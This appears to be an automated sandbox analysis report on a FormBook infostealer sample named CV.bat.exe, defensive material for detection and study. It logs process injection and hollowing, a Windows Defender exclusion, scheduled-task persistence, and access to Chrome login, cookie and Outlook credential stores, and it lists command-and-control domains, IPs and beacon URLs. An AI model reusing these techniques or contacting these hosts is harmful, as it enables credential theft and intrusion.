Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\chkdsk.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 715070 Sample: CV.bat.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for dropped file 2->46 48 Sigma detected: Scheduled temp file as task from temp location 2->48 50 8 other signatures 2->50 8 CV.bat.exe 7 2->8         started        process3 file4 30 C:\Users\user\AppData\...\PzKpucfDtCCmww.exe, PE32 8->30 dropped 32 C:\...\PzKpucfDtCCmww.exe:Zone.Identifier, ASCII 8->32 dropped 34 C:\Users\user\AppData\Local\...\tmpE00F.tmp, XML 8->34 dropped 36 C:\Users\user\AppData\...\CV.bat.exe.log, ASCII 8->36 dropped 54 Uses schtasks.exe or at.exe to add and modify task schedules 8->54 56 Adds a directory exclusion to Windows Defender 8->56 58 Injects a PE file into a foreign processes 8->58 12 CV.bat.exe 8->12         started        15 powershell.exe 18 8->15         started        17 schtasks.exe 1 8->17         started        signatures5 process6 signatures7 68 Modifies the context of a thread in another process (thread injection) 12->68 70 Maps a DLL or memory area into another process 12->70 72 Sample uses process hollowing technique 12->72 74 Queues an APC in another process (thread injection) 12->74 19 explorer.exe 12->19 injected 23 conhost.exe 15->23         started        25 conhost.exe 17->25         started        process8 dnsIp9 38 www.yaignars.site 91.195.240.94, 49703, 49704, 49705 SEDO-ASDE Germany 19->38 40 www.miarizzuto.org 63.141.242.46, 49702, 80 NOCIXUS United States 19->40 42 www.hipnoterapia.store 19->42 52 System process connects to network (likely due to code injection or exploit) 19->52 27 chkdsk.exe 13 19->27         started        signatures10 process11 signatures12 60 Tries to steal Mail credentials (via file / registry access) 27->60 62 Tries to harvest and steal browser information (history, passwords, etc) 27->62 64 Deletes itself after installation 27->64 66 2 other signatures 27->66
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.195.240.94
 www.yaignars.site Germany
47846 SEDO-ASDE true
63.141.242.46
 www.miarizzuto.org United States
33387 NOCIXUS true

Contacted Domains

Name IP Active
www.yaignars.site 91.195.240.94 true
www.miarizzuto.org 63.141.242.46 true
www.hipnoterapia.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.miarizzuto.org/redb/ true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 low
http://www.yaignars.site/redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ== true
  • Avira URL Cloud: safe
 unknown
http://www.yaignars.site/redb/ true
  • Avira URL Cloud: safe
 unknown
http://www.miarizzuto.org/redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A== true
  • Avira URL Cloud: safe
 unknown